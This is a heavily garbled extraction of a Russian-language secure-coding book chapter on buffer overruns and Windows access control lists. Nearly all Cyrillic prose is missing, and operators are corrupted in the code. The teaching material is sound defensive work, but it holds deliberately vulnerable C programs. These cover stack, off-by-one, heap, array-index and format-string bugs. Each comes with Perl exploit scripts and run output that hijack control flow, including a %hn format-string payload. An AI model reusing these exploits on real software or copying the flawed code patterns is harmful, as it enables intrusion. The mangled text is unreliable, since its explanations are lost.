(replay)
T, R, I D
.
!
(
SSL/TLS, IPSec
RPC/DCOM)
.
.
MAC.
4-13.
105
()
T, I D
,
SeDebugPrivilege
S, T, R I,
DE
.
.
Windows NT.
,
,
23
S, T, R I,
DE
,
.
ACL
,
.
,
,
TI
,
,
SSL/TLS IPSec
Web
TI
,
EFS.
.
EFS
,
106
,
. ,
, .
:
. , ,
, .
,
, ,
.
: ,
(, DFD),
STRIDE,
, DREAD,
STRIDE.
, ,
. Microsoft
,
.
I I
5
1:
.
60.
, . (Robert T. Morris) 1988 .
,
, . 2001 .,
, buffer, security
bulletin Microsoft Knowledge Base (http://search.support.microsoft.com/
kb) 20 , , ,
.
BugTraq (http://www.securityfocus.com)
, .
,
. Microsoft (Microsoft
Security Response Center) ,
100 000 , .
.
. ,
.
,
,
.
, ,
5 1:
109
. , . , ,
.
(
C C++,
),
.
Windows (Windows Security Push)
2002 . Microsoft .
.
, ,
.
Strsafe.h.
, BASIC (
Visual Basic, BASIC,
), Java, Perl, C#
,
.
C ++.
++, ,
, ++.
,
. , , . ,
, .
,
buffer overrun. !
, , .
,
, .
.
,
, , : ,
, . ,
: . .
. ,
.
,
,
ANSI Unicode.
, .
,
.
, ,
, ,
.
110
II
, .
,
strcpy.
. , ,
,
(command shell) .
, :
,
. ,
, .
,
. (
, ,
.) .
,
.
/*
StackOverrun.c
,
.
, bar.
*/
#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
char buf[10];
// ? printf?
// 8!).
// , .
printf(" :\n%p\n%p\n%p\n%p\n%p\n% p\n\n");
// "" " #1".
strcpy(buf, input);
printf("%s\n", buf);
printf(" :\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
printf("! !\n");
}
int main(int argc, char* argv[])
5 1:
111
{
// , .
printf(" foo = %p\n", foo);
printf(" bar = %p\n", bar);
if (argc != 2)
{
printf(" !\n");
return !1;
}
foo(argv[1]);
return 0;
}
Hello, World!.
foo
bar. %p printf.
, ,
foo, ,
DLL.
bar. foo printf,
,
. , foo
10 .
. ,
,
,
,
malloc.
, .
,
(Release) .
Microsoft Visual C++
,
. , Visual C++
Release. ,
:
C:\Secureco2\Chapter05>StackOverrun.exe Hello
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A < , foo.
112
II
00410EDE
Hello
:
6C6C6548 < , "Hello".
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
:
C:\Secureco2\Chapter05>StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
:
41414141
41414141
41414141
41414141
41414141
41414141
(. 51), , ,
0x41414141,
0x41414141.
. 51.
: ,
Dr. Watson. ASCII
, 0x41 A. ,
. ! , ,
, ,
. .
5 1:
113
,
. ,
, .
:
. ,
. ,
,
, .
,
,
. , ,
. ,
,
exploit.
,
, ,
. !
, !
:
,
. ,
.
, ,
. ,
.
. .
, , 100
.
,
, , ,
. , ,
. ,
, , ,
. , .
,
. .
, ,
.
! .
!
114
II
, .
:
C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
,
0x54535251. ASCII, 0x54 T.
:
C:\Secureco2\Chapter05>StacOverrun.exe ABCDEFGHIJKLMNOPQRS
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
, ! ,
, .
,
5 1:
115
$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);
, :
C:\Secureco2\Chapter05>perl HackOverrun.pl
foo = 00401000
bar = 00401045
:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
! !
, ? .
16
. ,
, , .
:
( U.S. English) .
,
. ,
. ,
Perl bar.
, Visual C++ .NET
/GC, . (
/GC !) /GC
.
116
II
,
(offbyone error). ,
.
/*
OffByOne.c
*/
#include <stdio.h>
#include <string.h>
void foo(const char* in)
{
char buf[64];
strncpy(buf, in, sizeof(buf));
buf[sizeof(buf)] = '\0'; //!!! !
printf("%s\n", buf);
}
void bar(const char* in)
{
printf("! !\n");
}
int main(int argc, char* argv[])
{
if(argc != 2)
{
printf(": %s [string]\n", argv[0]);
return !1;
}
printf(" foo %p, bar %p\n", foo, bar);
foo(argv[1]);
return 0;
}
strncpy
sizeof . ,
, . ,
Release .
C/C++ Debug Information
Format , , ,
. Visual Stu
dio .NET, /GC /RTC,
. Linker ()
.
A ,
foo .
, Registers EBP
.
5 1:
117
$arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40";
$cmd = "off_by_one ".$arg;
system($cmd);
:
118
II
, ,
.
,
, .
w00w00 on Heap Overflows (w00w00 ).
, (Matt Conover), w00w00 Security Development
(WSD), http://www.w00w00.org/files/articles/heap
tut.txt. WSD ,
,
. ,
:
,
, ,
;
,
. , StackGuard,
(Grispin Cowan) , ,
( ,
),
. Visual C++ .NET
.
;
.
,
.
UNIX, ,
Windows . Windows
,
. , w00w00,
BugTraq (http://www.securityfocus.com/archive/1/71598)
Solar Designer:
: BugTraq
: Netscape,
JPEG COM
: 25 2000 , 04:56:42
: Solar Designer <solar@false.com>
: <200007242356.DAA01274@false.com>
[ ]
5 1:
119
malloc (Doug Lea) (
Linux, libc5, glibc),
(locale) 8
( ,
glibc, en_US ru_RU.KOI8R).
: ( ),
. 0 ,
(LSB
).
, ,
free(3)
.
[ ]
, Linux/
x86. .
, Win32
( ntdll!RtlFreeHeap).
http://www.blackhat.com/presentations/winusa02/halvarflake
winsec02.ppt (Halvar Flake)
.
:
/*
HeapOverrun.cpp
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
*/
class BadStringBuf
{
public:
BadStringBuf(void)
{
m_buf = NULL;
}
120
II
~BadStringBuf(void)
{
if(m_buf != NULL)
free(m_buf);
}
void Init(char* buf)
{
// !
m_buf = buf;
}
void SetString(const char* input)
{
// .
strcpy(m_buf, input);
}
const char* GetString(void)
{
return m_buf;
}
private:
char* m_buf;
};
// BadStringBuf,
// .
BadStringBuf* g_pInput = NULL;
void bar(void)
{
printf("! !\n");
}
void BadFunc(const char* input1, const char* input2)
{
// , ,
// .
char* buf = NULL;
char* buf2;
buf2 = (char*)malloc(16);
g_pInput = new BadStringBuf;
buf = (char*)malloc(16);
// .
g_pInput!>Init(buf2);
5 1:
121
// , , ???
strcpy(buf, input1);
g_pInput!>SetString(input2);
printf(" 1 = %s\n 2 = %s\n",
buf, g_pInput !>GetString());
if(buf != NULL)
free(buf);
}
int main(int argc, char* argv[])
{
// argv
char arg1[128];
// bar.
// , Intel
// (little endian).
char arg2[4] = {0x0f, 0x10, 0x40, 0};
int offset = 0x40;
// 0xfd ! ,
// .
// 0xfd .
// ,
// .
memset(arg1, 0xfd, offset);
arg1[offset] = (char)0x94;
arg1[offset+1] = (char)0xfe;
arg1[offset+2] = (char)0x12;
arg1[offset+3] = 0;
arg1[offset+4] = 0;
printf(" bar is %p\n", bar);
BadFunc(arg1, arg2);
if(g_pInput != NULL)
delete g_pInput;
return 0;
}
Secureco2\Chapter05. ,
main. ,
, .
. ,
, , BadFunc
.
122
II
, BadFunc ,
, ,
, . C++,
BadStringBuf, .
. ,
malloc, free .
, .
. ,
, ,
( ) ,
.
.
? ,
,
? ,
, , ,
0x40 .
,
!
, bar,
, 0x0012fe94,
,
BadFun. ,
, Visual C++ 6.0,
Release
. ,
0x0012fe94 bar.
: , .
, :
bar 0040100F
1 = ????????????????????????????????????????????????????????o57
2 = 64@
! !
,
Visual C++ !
,
, . Solar Designer
, ,
,
.
. ,
, (, )
, . :
5 1:
123
,
.
,
, , , , .
,
. .
, ,
. ,
? ,
,
, . .
, ,
:
/*
ArrayIndexError.cpp
*/
#include <stdio.h>
#include <stdlib.h>
int* IntVector;
void bar(void)
{
printf("! !\n");
}
void InsertInt(unsigned long index, unsigned long value )
{
// ,
// 64 ,
// unsigned short
// .
printf(" %p\n", &(IntVector[index]));
IntVector[index] = value;
}
bool InitVector(int size)
{
IntVector = (int*)malloc(sizeof(int)*size);
printf(" IntVector: %p\n", IntVector);
124
II
if(IntVector == NULL)
return false;
else
return true;
}
int main(int argc, char* argv[])
{
unsigned long index, value;
if(argc != 3)
{
printf(": %s [index] [value]\n");
return !1;
}
printf(" bar %p\n", bar);
// 64 <g>.
if(!InitVector(0xffff))
{
printf(" !\n");
return !1;
}
index = atol(argv[1]);
value = atol(argv[2]);
InsertInt(index, value);
return 0;
}
ArrayIndexError.cpp Secureco2\Chapter05.
, ,
,
, .
.
0x00510048, ,
( ), ,
0x0012FF84. ,
, ,
:
= + * sizeof()
, :
5 1:
125
,
, .
, ,
. BugTraq:
(http://www.securityfocus.com/archive/1/81565) (Tim Newsham),
(http://www.securityfocus.com/archive/1/66842) (Lamagra
126
II
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
typedef void (*ErrFunc)(unsigned long);
void GhastlyError(unsigned long err)
{
printf(" ! ! err = %d\n", err);
// .
// , "" X Window,
// .
// main, .
exit(!1);
}
void RecoverableError(unsigned long err)
{
printf("! , , , ! err = %d\n",
err);
}
void PrintMessage(char* file, unsigned long err)
{
ErrFunc fErrFunc;
5 1:
char buf[512];
if(err == 5)
{
//
fErrFunc = GhastlyError;
}
else
{
fErrFunc = RecoverableError;
}
_snprintf(buf, sizeof(buf)!1, " %s", file);
// , ,
printf("%s", buf);
// , !
printf("\n fErrFunc ! %p\n", &fErrFunc);
// ! ""!
// .
fprintf(stdout, buf);
printf("\n ErrFunc: %p\n", fErrFunc);
fErrFunc(err);
}
void foo(void)
{
printf("! !\n");
}
int main(int argc, char* argv[])
{
FILE* pFile;
// ,
printf(" foo ! %p\n", foo);
//
pFile = fopen(argv[1], "r");
if(pFile == NULL)
{
PrintMessage(argv[1], errno);
}
else
{
printf(" %s\n", argv[1]);
127
128
II
fclose(pFile);
}
return 0;
}
. ,
, PrintMessage, ,
(
), . PrintMessage
.
printf, exploit
, . , ,
foo.
:
C:\Secureco2\Chapter05>formatstring.exe not_exist
foo ! 00401100
not_exist
fErrFunc ! 0012FF1C
not_exist
ErrFunc: 00401030
! , , , err = 2
:
C:\Secureco2\Chapter05>formatstring.exe %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%
x%x%x%x%x%x%x%x
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
fErrFunc ! 0012FF1C
14534807ffdf000000000000000012fde8077f516b36e6e6143662
0746f20646e69782578257825782578257825782578257825782578257825
ErrFunc: 00401030
! , , , ! err = 2
! , .
7825 %x ,
(little endian).
.
. Perl
, $arg.
$arg:
#
# $arg
# exploit!
# %p 0x67666500
5 1:
129
# , ,
# 0x00656667
$arg = "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%p"."ABC";
# $arg
# $arg = "......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%p"."ABC";
# ! ErrFunc
# $arg = ".....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
# ,
# exploit!
# $arg = "%.4066x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
$cmd = "formatstring ".$arg;
system($cmd);
ABC %x
%p. ,
%x :
C:\Secureco2\Chapter05>perl test1.pl
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
70005c6f00727[]782578257025782500434241ABC
%x, 00434241ABC.
, %p, ABC.
.
exploit, Perl,
ABC \x1c\xff\x12, ,
fErrFunc! , ErrFunc
.
(.)
%x. , 00434241ABC,
,
4 , %x ,
%p , . exploit
:
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
130
II
......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
......70005c6f00727[...]8257025782500434241ABC
45
, . ,
, %hn 16 ,
%p. (
h), ABC \x1c\xff\x12 .
, , :
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
.....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn? ?
fErrFunc ! 0012FF1C
.....70005c6f00727[]78257825786e682578? ?
ErrFunc: 00400129
, . :
ErrFunc! ,
foo 0x00401100, ErrFunc 0x00400129,
foo 4055 , . , ,
.4066 %x, !
test.pl :
ErrFunc 00401100
! !
,
. 2 , .
,
,
. .
,
, . , ,
.
Unicode ANSI
,
, ANSI Unicode,
Windows. ,
. . Windows NT ( )
ANSI, Unicode, Unicode
,
(wide), , .
5 1:
131
MultiByteToWideChar,
(). :
MultiByteToWideChar(CP_ACP, 0,
szName,
!1,
wszUserName,
sizeof(wszUserName) /
sizeof(wszUserName[0]));
, :
132
II
, Unicode
, IPP (Internet Printing
Protocol), Unicode. MS0123 (http://www.micro
soft.com/technet/security). IPP ISAPI
IIS 5 (Internet Information Services), ;
,
. IIS. :
TCHAR wszComputerName[256];
BOOL GetServerName(EXTENSION_CONTROL_BLOCK *pECB) {
DWORD dwSize = sizeof(wszComputerName);
char
szComputerName[256];
if (pECB!>GetServerVariable (pECB!>ConnID,
"SERVER_NAME",
szComputerName,
&dwSize)) {
// ! .
}
ISAPI GetServerVariable dwSize
szComputerName. dwSize 512, TCHAR ,
Unicode.
, 512 szComputerName,
256 . !
, , ANSI
Unicode, . null,
? (Chris Anley) (http://www.nextgenss.com/papers/
unicodebo.pdf) , . , ,
, , , Intel
.
Unicode
. , ,
, .
!
,
.
(Steve Maguire) Writing
Solid Code ( ) (Microsoft Press, 1993).
.
, ,
. ,
,
, .
, :
5 1:
133
#ifdef _DEBUG
memset(dest, 'A', buflen); //buflen =
#endif
, .
, . ,
,
, .
,
Strsafe.h; .
,
. , ,
.
, lstrcpy, lstrcat lstrcpyn, Windows,
Windows , StrCpy, StrCat
StrCpyN ( Shlwapi.dll). lstr
,
( , LPTSTR),
, ANSI.
, , strsafe.
strcpy
, ,
. :
134
II
, ,
. null,
.
null, ,
, null.
, .
,
.
strcpy:
/* , strcpy . */
bool HandleInput(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
//
//
//
//
//
//
strlen , null.
: strlen, sizeof size_t,
.
, , size_t
, 20
.
// .
return true;
}
, ,
null, , , .
, strcpy
. , ,
, .
strcpy. , ,
5 1:
135
, , , .
, strcpy ,
.
:
#define STRSAFE_NO_DEPRECATE
,
, . (
2001 ., .)
,
. strcpy, , .
strncpy
, . :
/* , strncpy,
. */
bool HandleInput_Strncpy1(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
136
II
/* strncpy.
, null. */
bool HandleInput_Strncpy2(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
buf[sizeof(buf) ! 1] = '\0';
//
// ! (pragma),
// , , sizeof(buf),
// sizeof(buf) .
strncpy(buf, input, sizeof(buf));
if(buf[sizeof(buf) ! 1] != '\0')
{
5 1:
137
//!
return false;
}
// .
return true;
}
HandleInput_Strncpy2 .
null , strncpy
, sizeof(buf) 1 . ,
, null
, ;
.
sprintf
sprintf strcpy .
. :
/* sprintf */
bool SprintfLogError(int line, unsigned long err, char* msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// sprintf???
sprintf(buf, " %d = %d ! %s\n", line, err, msg);
// ,
// .
return true;
}
, ? msg
null, SprintfLogError, , .
21 . err
10 , line 11 . (
, .) ,
msg 89 .
,
. sprintf . ,
, :
138
II
_snprintf
. :
int _snprintf( char *buffer, size_t count, const char *format [, argument] ... );
_sprintf, .
:
/* _snprintf */
bool SnprintfLogError(int line, unsigned long err, char * msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// null!
// ?
if(_snprintf(buf, sizeof(buf)!1,
" %d = %d ! %s\n", line, err, msg) < 0)
{
// !
return false;
}
else
{
buf[sizeof(buf)!1] = '\0';
}
// ,
// .
5 1:
139
return true;
}
, , ,
: _snprintf ,
null ,
Microsoft C, .
, C,
ISO C99. _snprint (, ,
), ,
. :
, , ,
, null.
,
, , ;
.
, ,
, null.
null.
. strcpy, strcat ( ),
strncat , ,
, . _snprint
.
_snprint strncpy
strncat. ,
.
/* STL */
#include <string>
using namespace std;
void HandleInput_STL(const char* input)
{
string str1, str2;
// , ,
// null.
str1 = input;
// , null, :
str2.append(input, 132);
// 132 == , .
140
II
// .
// .
printf("%s\n", str2.c_str());
}
! :
gets fgets
gets. :
Strsafe.h
Windows (Windows Security Push)
2002 . ,
,
. , (
SDK):
5 1:
141
,
;
null,
;
HRESULT
S_OK;
:
(cch) (cb);
(Ex) ,
.
Strsafe.h Secureco2\Strsafe.
, . ,
. , sizeof msize.
, strncat, ,
. null
, , , ,
. , .
null.
. ,
, strncpy? ,
; ,
.
,
ANSI Unicode , ,
, .
, strsafe :
, . ,
, ;
STRSAFE_NO_CB_FUNCTIONS STRSAFE_NO_CCH_FUNCTIONS.
, ,
, . :
STRSAFE_FILL_BEHIND_NULL ,
. , ,
, ;
STRSAFE_IGNORE_NULLS null .
lstrcpy;
STRSAFE_FILL_ON_FAILURE
;
STRSAFE_NULL_ON_FAILURE
;
STRSAFE_NO_TRUNCATION .
, .
142
II
.
, ,
.
, ( ),
, .
Strsafe.h : STRSAFE_NO_
DEPRECATE, !
:
, ,
.
, .
, , ,
, .
Web http://msdn.microsoft.com/library/enus/winui/winui/windowsuserinter
face/resources/strings/usingstrsafefunctions.asp.
C strsafe:
// CRT!
void UnsafeFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD);
strncpy(szPath, szCWD, cchPath);
strncat(szPath, TEXT("\\"), cchPath);
strncat(szPath, TEXT("desktop.ini"),cchPath);
}
// strsafe
bool SaferFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
if (GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD) &&
SUCCEEDED(StringCchCopy(szPath, cchPath, szCWD)) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("\\"))) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("desktop.ini")))) {
return true;
}
return false;
}
,
strsafe, .
strsafe. ?
5 1:
143
char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff1), szData);
StringCchCat.
: buf2 , buf1. :
char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff2), szData);
C.
, strcpy strcat
strncpy strncat , ,
. ?
144
II
/GS , StackGuard,
(Grispin Cowan) http://
www.immunix.org. ,
gcc. /GS StackGuard
, .
. ,
Visual C++ .NET, /GS
? . ,
/GS, StackGuard .
. ( ,
Microsoft Office.)
(stack smashing)
.
/GS.
(pointer subterfuge)
. /GS
, .
(register attack) ,
( EBP), .
.
VTable (VTable hijacking)
, VTable . , /GS
. /GS
, ,
,
. , VTable
.
(exception handler clobbe
ring) ,
. /GS ,
.
(index out of range)
,
. /GS ,
.
(heap overflow)
. /GS .
/GS , ?
, EIP EBP.
, ,
, . ,
, /GS
5 1:
145
( ).
,
.
, ,
. ,
.
. , ,
, (
http://immunix.org/stackguard.html), ,
.
(Greg Hoglund)
NTBUGTRAQ, , /GS. ,
, .
,
, ,
.
,
, , , , .
, ,
. .
,
.
( ), .
,
?
. ,
.
:
146
II
/GS ( ) ,
.
(
).
! /GS , .
, .
. ,
. , ,
, ,
.
,
. :
,
Strsafe.h, . ,
, .
, ,
, , .
Microsoft Windows
.
(Access Control List, ACL).
ACL Windows NT/2000/XP Windows .NET Server
2003.
, ACL
,
.
, .
, ,
, , ACL,
, , ACL,
(Discretionary Access Control List, DACL)
(Access Control Entry, ACE)
.
ACL
,
ACL ,
.
, .
! ACL
. .
148
II
,
, ACL Full Control (
) Everyone (). ,
, , ,
,
. , ,
ACL:
149
? (
). ACL .
Full Control Everyone, ,
,
64 , . ,
Everyone Deny: Full Controll (:
), .
ACL Full Control Administrators Read
() Everyone, ,
( WRITE_DAC).
.
, ,
.
, !
, , ACL,
? ! ,
3. ,
.
:
ACL,
, ,
, .
:
// , .
DWORD cbBuff = 0;
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
NULL,
&cbBuff) == ERROR_SUCCESS) {
BYTE *pbBuff = new BYTE[cbBuff];
// , cbBuff.
if (pbBuff && RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
pbBuff,
&cbBuff) == ERROR_SUCCESS) {
// ! .
// .
}
}
delete [] pbBuff;
150
II
, .
, ,
. ,
ACL 10 ,
10 ?
? ,
10 .
, ,
.
:
BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Northwindtraders",
0,
KEY_READ,
&hKey) == ERROR_SUCCESS) {
DWORD cbBuff = sizeof (bBuff);
// , , MAX_BUFF.
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
bBuff,
&cbBuff) == ERROR_SUCCESS) {
// ! .
}
}
if (hKey)
RegCloseKey(hKey);
,
, , , MAX_BUFF.
, RegQueryValueEx ERROR_MO
RE_DATA, , .
: ,
ACL.
ACL
. ACL.
ACL
ACL, , ,
. , , .. ACL
, ,
151
152
II
, ACL
szVol,
:
#include <stdio.h>
#include <windows.h>
void main() {
char *szVol = "c:\\";
DWORD dwFlags = 0;
if (GetVolumeInformation(szVol,
NULL,
0,
NULL,
NULL,
&dwFlags,
NULL,
0)) {
printf(" %s %s ACL.",
szVol,
(dwFlags & FS_PERSISTENT_ACLS) ? "" : "");
} else {
printf(" %d",GetLastError());
}
}
: , \\Blakes
Laptop\BabyPictures. GetVolumeInformation
Platform SDK MSDN.
VBScript (Microsoft Visual Basic
Scripting Edition) Microsoft JScript. VBScript
, NTFS,
ACL, FileSystemObject.
, NTFS ,
ACL. , Windows
ACL NTFS.
153
, ACL.
Windows . , ,
.
, ;
Administrators ().
ACL
,
, : ACE ACL,
. , , ACE
ACL, .
.
ACL.
ACL;
.
, ACL , :
1. , ;
2. ,
;
3. ;
4.
.
, , ,
, , Web, . .,
. , ACL
. ,
, , .
.
, Everyone:
Full Control .
:
.
: .
.
.
. ,
(use case) UML
(Unified Modeling Language), , ,
.
, ,
.
154
II
UML
(Martin Fowler) (Kendall Scott) UML Distilled: A
Brief Guide to the Standard Object Modeling Language ( UML:
)
(2nd Edition, AddisonWesley Publishing Co, 1999).
, ACL ACE,
, :
. ACE.
, ,
ACE: Interactive: Read (: ).
. 32
, ,
ACE.
Interactive ,
,
( ,
). ,
SID , LogonUser
dwLogonType, LOGON32_LOGON_INTER
ACTIVE.
,
. ,
FTP HTTP
IIS 5.
(
, ), ACL.
ACL, . 61.
6-1. (ACL),
-
Accounting ()
Interactive
Read ()
Administrators ()
Full Control ( )
SYSTEM
Full Control ( )
! ACL ACE
. ACL,
Windows, ACE
.
ACE ,
, .
155
Everyone: Full Control ACL
.
, , ,
.
, ,
ACL
!
ACL ,
(Terminal Server).
, ,
ACL
.
ACL
2001 . Microsoft
Weak Permissions on Winsock Mutex Can Allow Service
Failure ( Winsock
) (MS01003) (www.microsoft.com/technet/security).
ACE-
,
.
ACE.
.
.
ACL
, ,
ACL , ,
. ACL Windows NT 4 Windows 2000,
Visual Studio .NET
ATL (Active Template Library).
ACL Windows NT 4
, ACL
C++, . ,
ACL ,
. Windows NT 4
156
II
. ( Windows NT
malloc AddAce!) , ACL
(security descriptor), .
: ACL,
. ACL
. , ACL,
, ACL
.
/*
NT4ACL.cpp
*/
#include <windows.h>
#include <stdio.h>
#include <aclapi.h>
PSID pEveryoneSID = NULL, pAdminSID = NULL, pNetworkSID = NULL;
PACL pACL = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
// ACL ACE!:
// Network (Deny Access)
// Everyone (Read)
// Administrator (Full Control)
try {
const int NUM_ACES = 3;
EXPLICIT_ACCESS ea[NUM_ACES];
ZeroMemory(&ea, NUM_ACES * sizeof(EXPLICIT_ACCESS)) ;
// SID Network.
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthNT, 1,
SECURITY_NETWORK_RID,
0, 0, 0, 0, 0, 0, 0,
&pNetworkSID) )
throw GetLastError();
ea[0].grfAccessPermissions = GENERIC_ALL;
ea[0].grfAccessMode = DENY_ACCESS;
ea[0].grfInheritance= NO_INHERITANCE;
ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[0].Trustee.ptstrName = (LPTSTR) pNetworkSID;
// SID Everyone.
SID_IDENTIFIER_AUTHORITY SIDAuthWorld =
SECURITY_WORLD_SID_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthWorld, 1,
SECURITY_WORLD_RID,
0, 0, 0, 0, 0, 0, 0,
&pEveryoneSID) )
throw GetLastError();
ea[1].grfAccessPermissions = GENERIC_READ;
ea[1].grfAccessMode = SET_ACCESS;
ea[1].grfInheritance= NO_INHERITANCE;
ea[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[1].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[1].Trustee.ptstrName = (LPTSTR) pEveryoneSID;
// SID
// BUILTIN\Administrators.
if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdminSID) )
throw GetLastError();
ea[2].grfAccessPermissions = GENERIC_ALL;
ea[2].grfAccessMode = SET_ACCESS;
ea[2].grfInheritance= NO_INHERITANCE;
ea[2].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[2].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea[2].Trustee.ptstrName = (LPTSTR) pAdminSID;
// ACL ACE!.
if (ERROR_SUCCESS != SetEntriesInAcl(NUM_ACES,
ea,
NULL,
&pACL))
throw GetLastError();
// .
pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
SECURITY_DESCRIPTOR_MIN_LENGTH);
if (pSD == NULL)
throw GetLastError();
if (!InitializeSecurityDescriptor(pSD,
SECURITY_DESCRIPTOR_REVISION))
throw GetLastError();
// ACL .
if (!SetSecurityDescriptorDacl(pSD,
TRUE, // fDaclPresent flag
pACL,
FALSE)) {
throw GetLastError();
157
158
II
} else {
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
sa.lpSecurityDescriptor = pSD;
if (!CreateDirectory("C:\\Program Files\\MyStuff", &sa))
throw GetLastError();
} // try.
} catch(...) {
// .
}
if (pSD)
LocalFree(pSD);
if (pACL)
LocalFree(pACL);
// FreeSID SID, AllocateAndInitializeSID.
if (pEveryoneSID)
FreeSid(pEveryoneSID);
if (pNetworkSID)
FreeSid(pNetworkSID);
if (pAdminSID)
FreeSid(pAdminSID);
Secureco2\Chapter06. ,
, . ,
ACL
(security descriptor).
SECURITY_ATTRIBUTES, , ,
. :
( SID), SetSecurity
DescriptorOwner;
( SID), SetSecurityDescriptor
Group;
DACL, SetSecurityDescriptorDacl;
SACL, SetSecurityDescriptorSacl.
. , ,
, ,
Administrators (),
. DACL,
EXPLICIT_ACCESS. EXPLICIT_ACCESS
ACE (SID)
, . EXPLICIT_ACCESS
159
, , ACE .
ACL . 61.
API, ACL:
SetFileSecurity SetNamedSecurityInfo. Windows NT,
Windows NT 4 .
Windows 2000 ,
(Security Descriptor Definition Language), .
SECURITY_ATTRIBUTES
SECURITY_DESCRIPTOR
ACL
EXPLICIT_ACCESS
SID
. 61.
EXPLICIT_ACCESS
SID
ACL
160
II
/*
SDDLACL.cpp
*/
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <sddl.h>
void main() {
